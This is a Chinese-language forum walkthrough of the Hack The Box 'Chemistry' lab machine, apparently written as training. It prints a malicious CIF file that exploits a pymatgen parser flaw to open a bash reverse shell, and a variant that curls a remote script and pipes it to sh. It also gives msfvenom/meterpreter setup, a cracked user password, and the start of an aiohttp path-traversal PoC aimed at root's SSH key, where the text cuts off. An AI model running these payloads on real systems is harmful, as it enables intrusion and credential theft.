找回密码
 立即注册
首页 业界区 业界 Hack The Box-Chemistry靶机渗透

Hack The Box-Chemistry靶机渗透

坟菊 2025-6-2 00:31:27
通过信息收集访问5000端口,cif历史cve漏洞反弹shell,获取数据库,利用低权限用户登录,监听端口,开放8080端口,aihttp服务漏洞文件包含,获取root密码hash值,ssh指定登录
靶机信息
1.png

最终目标
2.png

一、信息收集

nmap扫描,开放了22和5000端口
  1. Werkzeug/3.0.3 Python/3.9.5
  2. OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
复制代码
3.png

访问5000端口,是一个CIF仪器面板
  1. # CIF(Crystallographic Information File)是一种用于描述晶体结构的文件格式。它广泛应用于化学、材料科学和固体物理等领域,特别是在晶体学研究中。CIF文件包含了关于晶体的详细信息,包括原子位置、晶格参数、对称性、空间群等。
复制代码
4.png

登录尝试弱口令无果,随便注册一个账户登录,发现一处示例
5.png

下载下来查看一下
6.png

尝试搜索组件漏洞信息
7.png

查找到cif漏洞
8.png

发现可以利用命令执行反弹shell
9.png

二、获取shell

这里先看一下我们kali挂完代理的ip,这个地方我自己犯了一个致命错误,因为是第一次打htb靶机,忽略了kali挂代理ip会变,使用的是本机的ip进行反弹shell,导致一直反弹不成功
10.png

命令执行反弹shell

修改脚本反弹shell到kali
  1. data_5yOhtAoR
  2. _audit_creation_date            2018-06-08
  3. _audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
  4. loop_
  5. _parent_propagation_vector.id
  6. _parent_propagation_vector.kxkykz
  7. k1 [0 0 0]
  8. _space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.20/4444 0>&1'");0,0,0'
  9. _space_group_magn.number_BNS  62.448
  10. _space_group_magn.name_BNS  "P  n'  m  a'  "
复制代码
上传该文件
11.png

点击View,成功获取反弹shell
12.png

msfconsole获取shell

执行以下命令,使用两个命令面板
  1. msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.10.16.20 lport=4444 -f elf>aa.elf
  2. python3 -m http.server 80
  3. msfconsole
  4. use exploit/multi/handler
  5. set payload linux/x64/meterpreter/reverse_tcp
  6. set lhost 10.10.16.20 #kali的ip
  7. set lport 4444
  8. run
复制代码
远程下载执行脚本提权

先把反弹shell脚本写入到sh文件,然后上传web
  1. echo -ne '#!/bin/bash\n/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.20/4444 0>&1"' > shell.sh
  2. sudo python3 -m http.server 80
复制代码
新建cif文件,然后写入以下命令,利用curl下载命令下载脚本,然后执行
  1. data_5yOhtAoR
  2. _audit_creation_date           2018-06-08
  3. _audit_creation_method         "Pymatgen CIF Parser Arbitrary Code Execution
  4. Exploit"
  5. loop_
  6. _parent_propagation_vector.id
  7. _parent_propagation_vector.kxkykz
  8. k1 [0 0 0]
  9. _space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in
  10. ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" +
  11. "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system
  12. ("curl http://10.10.16.20/shell.sh|sh");0,0,0'
  13. _space_group_magn.number_BNS 62.448
复制代码
三、提权

先基础查找信息
13.png

查看suid信息,没什么可利用的
14.png

查看/etc/passwd看看有没有什么泄露的,发现一个可以执行bash的用户rosa
15.png

查看文件系统,没有什么可以利用的
16.png

进入该目录查看,发现一处数据库信息
17.png

​           使用sqlite3查看,然后查看user表的所有列,得到的所有用户名和密码hash值,注意这个rosa用户的密码63ed86ee9f624c7b14f1d4f43dc251a5
18.png

解密一下,得到密码:unicorniosrosados
19.png

这里我直接切换用户不成功,就ssh连接了,不过连接后可能会有些延迟
20.png

查看当前目录,发现第一个flag
21.png

列出当前系统上所有处于监听状态(LISTEN)的网络端口,有一个本地服务
22.png

了解一下http-alt
  1. # 替代端口:在某些网络环境中,可能会使用非标准端口(如8080、8000等)来运行HTTP服务。这些端口被称为“替代端口”,可以用于绕过防火墙限制或进行特定的网络配置。
  2. # 代理服务器:在某些情况下,HTTP-ALT可能涉及到通过代理服务器进行HTTP请求,这些代理可能会监听不同的端口。
  3. # 应用程序和服务:某些应用程序或服务可能会在非标准端口上提供HTTP接口,这些接口也可以被称为HTTP-ALT。
复制代码
把网页内容下载下来,看到服务信息
23.png

搜索历史漏洞,找到一个exp:https://github.com/z3rObyte/CVE-2024-23334-PoC
24.png

修改poc
[code]#!/bin/bashurl="http://localhost:8080" #目标urlstring="../"payload="/assets/"     #路径file="root/.ssh/id_rsa" # 查看hash值 /for ((i=0; i

相关推荐

您需要登录后才可以回帖 登录 | 立即注册